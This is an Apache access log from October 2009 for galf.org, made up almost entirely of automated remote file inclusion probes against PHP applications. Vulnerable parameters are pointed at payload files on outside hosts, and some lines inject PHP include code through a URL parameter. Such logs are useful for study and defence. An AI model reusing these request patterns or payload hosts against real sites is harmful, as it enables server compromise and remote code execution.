58.230.118.81 - - [25/Oct/2009:23:07:55 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:55 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:55 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:55 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:56 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:56 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:56 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:59 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:59 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.230.118.81 - - [25/Oct/2009:23:07:59 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
174.143.3.188 - - [25/Oct/2009:23:08:47 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:08:47 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:08:47 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:08:47 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
200.108.199.16 - - [25/Oct/2009:23:10:51 -0700] "GET /logs/access_090921.log/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.108.199.16 - - [25/Oct/2009:23:10:52 -0700] "GET /admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.108.199.16 - - [25/Oct/2009:23:10:53 -0700] "GET /logs/admincp.php?rootpath=http://vhost.net16.net/filipe_0u7/ownzz/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.181.243.6 - - [25/Oct/2009:23:15:44 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.181.243.6 - - [25/Oct/2009:23:15:44 -0700] "GET /logs/access_090720.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.181.243.6 - - [25/Oct/2009:23:15:44 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:18:25 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:18:25 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:18:26 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:18:26 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
88.191.35.178 - - [25/Oct/2009:23:23:57 -0700] "GET /appserv/main.php?appserv_root=http://beautyengg.com/README?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
88.191.35.178 - - [25/Oct/2009:23:23:57 -0700] "GET /logs//appserv/main.php?appserv_root=http://beautyengg.com/README?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
88.191.35.178 - - [25/Oct/2009:23:23:58 -0700] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://beautyengg.com/README?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
88.191.35.178 - - [25/Oct/2009:23:25:23 -0700] "GET /logs/access_090706.log%20%20//appserv/main.php?appserv_root=http://beautyengg.com/README?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
88.191.35.178 - - [25/Oct/2009:23:26:30 -0700] "GET /logs/access_090720.log%20%20//appserv/main.php?appserv_root=http://beautyengg.com/README?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.181.243.6 - - [25/Oct/2009:23:27:17 -0700] "GET /logs/access_090720.log//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.181.243.6 - - [25/Oct/2009:23:27:19 -0700] "GET /logs/access_090810.log//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [25/Oct/2009:23:27:34 -0700] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [25/Oct/2009:23:27:34 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [25/Oct/2009:23:27:34 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
119.68.194.119 - - [25/Oct/2009:23:27:46 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
119.68.194.119 - - [25/Oct/2009:23:27:46 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
119.68.194.119 - - [25/Oct/2009:23:27:46 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.babyu.co.kr/babyubbs/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
201.218.228.226 - - [25/Oct/2009:23:28:29 -0700] "GET /logs/access_090706.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [25/Oct/2009:23:28:29 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [25/Oct/2009:23:28:29 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:28:48 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:28:48 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:28:49 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:28:49 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
67.15.88.55 - - [25/Oct/2009:23:29:00 -0700] "GET /logs/access_090720.log//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.15.88.55 - - [25/Oct/2009:23:29:20 -0700] "GET /logs/access_090810.log//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.97.212.185 - - [25/Oct/2009:23:30:03 -0700] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
201.218.228.226 - - [25/Oct/2009:23:31:52 -0700] "GET /logs/access_090706.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.seeum.co.kr/zero/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:32:28 -0700] "GET /logs/access_090518.log/?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:32:28 -0700] "GET /logs/?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:32:28 -0700] "GET /?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:32:29 -0700] "GET /logs/access_090518.log/?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:32:29 -0700] "GET /logs/?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:32:29 -0700] "GET /?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:33:19 -0700] "GET /logs/access_090406.log%20%20/?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:33:19 -0700] "GET /?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:33:19 -0700] "GET /logs/?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:33:19 -0700] "GET /logs/access_090406.log%20%20/?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:33:19 -0700] "GET /?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:33:19 -0700] "GET /logs/?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:33:44 -0700] "GET /logs/access_090810.log/?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:33:52 -0700] "GET /logs/access_090810.log/?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [25/Oct/2009:23:33:55 -0700] "GET /logs/access.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hongjinco.com/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
204.202.2.23 - - [25/Oct/2009:23:33:55 -0700] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hongjinco.com/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
204.202.2.23 - - [25/Oct/2009:23:33:55 -0700] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hongjinco.com/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [25/Oct/2009:23:35:39 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:35:39 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:35:39 -0700] "GET /logs/access_090629.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:35:39 -0700] "GET /logs/access_090720.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:35:39 -0700] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:35:39 -0700] "GET /logs/access_090629.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:35:39 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:35:39 -0700] "GET /logs/access_090720.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.15.88.55 - - [25/Oct/2009:23:37:00 -0700] "GET /logs/access.log//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.15.88.55 - - [25/Oct/2009:23:37:01 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
67.15.88.55 - - [25/Oct/2009:23:37:01 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [25/Oct/2009:23:37:36 -0700] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hongjinco.com/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [25/Oct/2009:23:37:36 -0700] "GET /logs/access.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hongjinco.com/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [25/Oct/2009:23:37:36 -0700] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hongjinco.com/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [25/Oct/2009:23:37:36 -0700] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hongjinco.com/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [25/Oct/2009:23:37:36 -0700] "GET /logs/access.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hongjinco.com/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
174.143.3.188 - - [25/Oct/2009:23:38:34 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:38:34 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:38:34 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:38:34 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:39:12 -0700] "GET /?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:39:12 -0700] "GET /logs/access_091012.log/?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:39:12 -0700] "GET /logs/?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:39:16 -0700] "GET /logs/access_091012.log/?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:39:16 -0700] "GET /logs/?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
91.121.182.16 - - [25/Oct/2009:23:39:16 -0700] "GET /?sourcedir=http://www.miomatrimonio.com/editor/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:40:24 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [25/Oct/2009:23:40:24 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [25/Oct/2009:23:40:24 -0700] "GET /logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [25/Oct/2009:23:40:25 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [25/Oct/2009:23:40:25 -0700] "GET /logs/access.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [25/Oct/2009:23:40:25 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.10.136.56 - - [25/Oct/2009:23:40:57 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:40:57 -0700] "GET /logs/access_091012.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:40:57 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:40:58 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:40:58 -0700] "GET /PhpLinkExchange/bits_listings.php?svr_rootP=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.10.136.56 - - [25/Oct/2009:23:40:58 -0700] "GET /logs/access_091012.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.seeum.co.kr/zero/zipcode/crespon1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
88.191.35.178 - - [25/Oct/2009:23:42:17 -0700] "GET /logs/access_090720.log//appserv/main.php?appserv_root=http://beautyengg.com/README?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.202.2.23 - - [25/Oct/2009:23:43:17 -0700] "GET /logs/access.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hongjinco.com/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [25/Oct/2009:23:47:10 -0700] "GET /logs/access.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hongjinco.com/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [25/Oct/2009:23:49:10 -0700] "GET /logs/access.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hongjinco.com/board/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
174.143.3.188 - - [25/Oct/2009:23:49:44 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:49:44 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
174.143.3.188 - - [25/Oct/2009:23:49:45 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
